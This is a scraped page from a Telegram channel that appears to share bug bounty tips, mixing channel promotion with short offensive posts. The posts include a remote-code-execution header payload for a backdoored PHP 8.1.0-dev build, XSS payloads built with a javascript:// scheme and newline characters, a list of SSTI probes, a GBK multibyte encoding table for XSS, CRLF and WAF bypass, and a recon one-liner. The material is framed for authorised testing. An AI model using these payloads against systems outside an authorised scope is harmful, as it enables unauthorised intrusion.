uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegramโ€™da oโ€˜tish

๐Ÿ›ก๏ธ Cybersecurity enthusiast | ๐Ÿ’ป Helping secure the digital world | ๐ŸŒ Web App Tester | ๐Ÿ•ต๏ธโ€โ™‚๏ธ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
5 860
Obunachilar
+624 soatlar
+707 kunlar
+36030 kunlar
Postlar arxiv
photo content

From 0 to 726 views per week. starting is a best and beautiful option u do and thanks to u guys also
From 0 to 726 views per week. starting is a best and beautiful option u do and thanks to u guys also

u guys can join and explain me here https://t.me/bug_hunting_talks, we can talk i need your suggestions its an humble request

Guys, i want your response, planning to start a bugbounty live classes training. for 2 months and 2 months internships for 20k is it going to work or not.

photo content

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #b
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

Bug Bounty Tip When the app only accepts URLs with a specific scheme, try injecting javascript://test.com Then, use these symbols to craft an XSS payload ๐Ÿ”น%0a ๐Ÿ”น%0d ๐Ÿ”น%E2%80%A8 ๐Ÿ”น%E2%80%A9 โœ… javascript://test.com%0aalert(1)

Bug Bounty Tip SSTI (Server Side Template Injection) Payload List ๐Ÿ”น{7*7} ๐Ÿ”น*{7*7} ๐Ÿ”น{{7*7}} ๐Ÿ”น[[7*7]] ๐Ÿ”น${7*7} ๐Ÿ”น@(7*7) ๐Ÿ”น ๐Ÿ”น<%= 7*7 %> ๐Ÿ”น${= 7*7} ๐Ÿ”น{{= 7*7}} ๐Ÿ”น${{7*7}} ๐Ÿ”น#{7*7} ๐Ÿ”น[=7*7] If evaluated as 49 - the target is vulnerable Cheers!

"๐Ÿค– Scan this QR code if you want to know what's cookin' at CipherOps! ๐Ÿณ๐Ÿ•ต๏ธโ€โ™‚๏ธ Unravel the mysteries of cyberworld at cipher
"๐Ÿค– Scan this QR code if you want to know what's cookin' at CipherOps! ๐Ÿณ๐Ÿ•ต๏ธโ€โ™‚๏ธ Unravel the mysteries of cyberworld at cipherops.tech. It's like a secret menu for techies! ๐ŸŒ๐Ÿ”“ #CipherOps #TechMystery #QRAdventure"

Do you think web developers should prioritize security against XSS vulnerabilities in their projects?
Anonymous voting

Bug Bounty Tip GBK Encoding / MultiByte Attack ๅ˜Š = %E5%98%8A = \u560a โ‡’ %0A ๅ˜ = %E5%98%8D = \u560d โ‡’ %0D ๅ˜พ = %E5%98%BE = \u563e โ‡’ %3E (>) ๅ˜ผ = %E5%98%BC = \u563c โ‡’ %3C (<) ๅ˜ข = %E5%98%A2 = \u5622 โ‡’ %22 (') ๅ˜ง = %E5%98%A7 = \u5627 โ‡’ %27 (") For XSS, CRLF, WAF bypass

I am looking for a contributors any one intrested can contribute on github [https://github.com/Adwaithsheety/Cipherops]

photo content

To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command: haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson Here's what this one-liner does step by step: haktrails -d example.com: Uses haktrails to discover subdomains of example.com. httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com. getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command. anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt. tojson: Converts the list of JavaScript URLs into JSON format.